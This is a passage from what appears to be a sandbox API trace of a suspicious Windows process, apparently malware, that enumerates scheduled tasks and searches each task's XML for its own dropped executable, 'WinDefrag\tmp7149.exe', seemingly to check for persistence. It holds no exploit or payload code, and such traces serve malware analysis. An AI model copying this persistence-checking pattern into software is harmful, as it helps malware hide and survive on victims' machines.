(This=0x4580a0) returned 0x0 [0260.133] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.133] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0260.134] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.134] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.134] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.134] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.134] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.136] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.136] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.136] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="RacTask") returned 0x0 [0260.136] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n") returned 0x0 [0260.140] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.209] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.209] IUnknown:Release (This=0x456b40) returned 0x0 [0260.209] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.211] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.211] IUnknown:Release (This=0x456b40) returned 0x0 [0260.211] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.211] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.211] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.213] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.213] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.213] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="MobilityManager") returned 0x0 [0260.213] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n") returned 0x0 [0260.215] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.251] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.251] IUnknown:Release (This=0x456b40) returned 0x0 [0260.251] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.252] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.252] IUnknown:Release (This=0x456b40) returned 0x0 [0260.252] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.252] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.252] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.254] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.254] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.254] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="RegIdleBackup") returned 0x0 [0260.254] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n") returned 0x0 [0260.258] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.304] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.304] IUnknown:Release (This=0x456b40) returned 0x0 [0260.304] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.306] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.306] IUnknown:Release (This=0x456b40) returned 0x0 [0260.306] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.306] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.306] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0260.307] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=0) returned 0x0 [0260.307] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.307] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0260.308] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.308] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.308] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.308] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.308] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.310] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0260.310] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0260.310] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="RemoteAssistanceTask") returned 0x0 [0260.311] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0260.314] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.364] IUnknown:Release (This=0x458030) returned 0x0 [0260.365] IUnknown:Release (This=0x456b40) returned 0x0 [0260.365] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.366] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.366] IUnknown:Release (This=0x456b40) returned 0x0 [0260.366] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.366] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.366] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.369] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0260.369] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.369] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="WindowsParentalControls") returned 0x0 [0260.369] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n") returned 0x0 [0260.372] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.415] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.415] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.415] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="WindowsParentalControlsMigration") returned 0x0 [0260.415] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n") returned 0x0 [0260.418] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.457] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.457] IUnknown:Release (This=0x456b40) returned 0x0 [0260.457] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0260.458] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0260.458] IUnknown:Release (This=0x456b40) returned 0x0 [0260.458] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0260.458] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0260.458] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0260.462] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=4) returned 0x0 [0260.462] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.462] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="AutoWake") returned 0x0 [0260.462] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n") returned 0x0 [0260.465] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.506] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.506] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.506] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="GadgetManager") returned 0x0 [0260.506] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n") returned 0x0 [0260.509] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0260.550] IUnknown:Release (This=0x457fd0) returned 0x0 [0260.550] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0260.550] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="SessionAgent") returned 0x0 [0260.550] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n 